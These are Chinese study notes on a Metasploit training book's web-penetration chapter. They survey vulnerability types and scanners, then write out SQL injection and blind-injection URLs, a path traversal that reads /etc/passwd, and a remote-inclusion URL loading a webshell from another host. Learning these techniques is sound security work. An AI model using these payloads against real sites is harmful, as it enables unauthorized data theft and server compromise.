標籤:儲存 數字 破解 注入攻擊 配置 基礎 where 退出 exp
繼續來學習metasploit。。。記好筆記是很重要的,下面開始本文:二.WEB應用滲透技術 1.WEB應用滲透基礎知識 先介紹WEB應用攻擊的主要類型(大致介紹,具體請自行查詢) Sql注入攻擊:大致分為 普通注入和盲注 跨站指令碼(XSS): 分為儲存型XSS,反射性XSS以及DOM型XSS 跨站偽造請求(CSRF):以XSS方式注入一段指令碼,受害者點擊該指令碼時,指令碼偽造受害者發出請求。 會話認證管理缺陷:驗證身份的功能存在缺陷。 安全誤配置:開發和管理員的失誤導致存在漏洞。 不安全密碼儲存:密碼以明文形式存在或密碼編譯演算法過於脆弱。 不安全的對象參考:攻擊者利用WEB系統本身的讀取功能,任意存取文檔,竊取敏感檔案。 限制URL訪問失敗:沒有對私人頁面的訪問進行身份認證。 缺乏傳輸層的保護:沒有設定SSL/TLS等保護機制,直接被攻擊者竊取敏感性資料。 未驗證的重新導向和跳轉:攻擊者通過未驗證重新導向頁面誘使受害者點擊,從而竊取受害者敏感性資料。 metasploit關於WEB應用滲透攻擊的模組較少,但是kali滲透系統裡有很多優秀的WEB滲透工具,彌補了metasploit的不足。 1.1metasploit的輔助模組 輔助模組基本都在 modules/auxiliary/,並且在最新的metasploit中內建了wmap WEB掃描器,允許使用者配置輔助模組,對網站進行集中掃描。 1.2滲透模組 滲透模組分散在module中的多個檔案夾下,有針對主流CMS的漏洞,也有針對各種資料庫漏洞的模組,同時也包含了成功後用來操作的webshell。 metasploit與W3AF,SQLMAP,wXf,XSSF,BeFF等WEB漏洞掃描器均有介面,可以更好的進行探測。2.WEB應用漏洞掃描探測 2.1.開源WEB應用漏洞掃描工具 Wapiti:對SQL注入的掃描準確度很高 W3AF:綜合很優秀,都有較高的準確度。 Sandcat Free Edition:對XSS跨站漏洞準確度很高 2.2掃描神器W3AF W3AF分為八類別模組:發現模組(尋找HTTP資訊,並探測伺服器,資料庫等資訊),審計模組(探測漏洞),搜尋模組(捕獲資訊),攻擊模組 (讀取掃描資訊,並試圖通過模組外掛程式攻擊),輸出模組(輸出掃描結果),修改模組(修改資訊),入侵模組(繞過入侵偵測系統),破解模組(破解需要認證的頁面,支援基本認證機制和表單登陸機制的破解) 具體使用方法不在詳解。 2.3 SQL注入漏洞探測 sqlmap是一款優秀的SQL注入漏洞的掃描工具。具體用法不再詳解。metasploit已經整合了此工具。 2.4 XSS漏洞探測 xsser,xssfuzz等工具,或者使用metasploit整合的W3AF。 2.5 WEB應用程式漏洞探測 wXf是WEB漏洞掃描和攻擊架構,利用metasploit架構的構想。kali中沒有整合這個工具,需自行下載。 3.WEB應用程式滲透測試 3.1 SQL注入分析 在這裡進行簡單的講解,具體更進階的內容請自己查詢 普通注入: http://www.XXX.net/do/plus/view.php?aid=236896‘ //看是否存在注入,若’被過濾,則不能判斷。 http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,2,3,4,5,6,7-- //這裡用--注釋後邊的語句,避免語法錯誤。該語句是用來判斷列數的,若返回錯誤資訊,則證明判斷錯誤,繼續加數字進行判斷。 http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,9,10 from 表名-- //得到資料庫版本和使用者名稱。 http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(schema_name),10 from information_schema.SCHEMA-- //查詢所有表 http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(table_name),10 from information_schema.tables where table_schema=database()-- //查詢表中所有列 http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(column_name),10 from information_schema.columns where table_name=列名十六進位-- //查詢列中欄位 盲註:這裡就只講解字元的猜解的盲注。 http://www.XXX.net/do/plus/view.php?aid=236896 and length(database())>1 http://www.XXX.net/do/plus/view.php?aid=236896 and length(database())>2 如果第一句沒報錯,第二句報錯了,則證明資料庫名是兩個字元。以此類推。。 http://www.XXX.net/do/plus/view.php?aid=236896 and ascii(substring(database(),1,1))>97 http://www.XXX.net/do/plus/view.php?aid=236896 and ascii(substring(database(),1,1))>98 如果第一句沒報錯,第二句報錯了,則證明資料庫名第一個字元的ASCII碼是98,以此類推。。。。 http://www.XXX.net/do/plus/view.php?aid=236896 and (select count(table_name) from information_schema where table_schema=database())>15 這句是獲得資料庫表的個數 接下來都差不多,不在多述。 3.2跨站攻擊執行個體分析 跨站指令碼攻擊架構(XSSF),具體教程請自行查詢。 3.3命令注入執行個體分析 一般流程都是掃描到某應用或者外掛程式的漏洞,然後去上網找關於該漏洞的利用代碼進行滲透擷取webshell,若能力高超,可以自己編寫利用的代碼或者把利用的代碼自己轉換成metasploit的exploit模組和payload模組。具體自行實踐,我能力有限。。。將來水平上來了會出教程。。。 3.4檔案包含和檔案上傳漏洞 檔案包含包括本地檔案包含(LFI)和遠程檔案包含(RFI)。 http://www.XXX.com/?page=././././etc/passwd //使用“./”退出目前的目錄,多試幾次 http://www.XXX.com/?page=www.ooo.com/shell.php //shell.php是事先在遠程主機上準備好的shell。 檔案上傳漏洞是由於網站沒有經過嚴格的檢查和過濾,可以提交惡意的檔案來擷取webshell。 關於繞過上傳請自行查詢。
《metasploit滲透測試魔鬼訓練營》學習筆記第四章—web應用滲透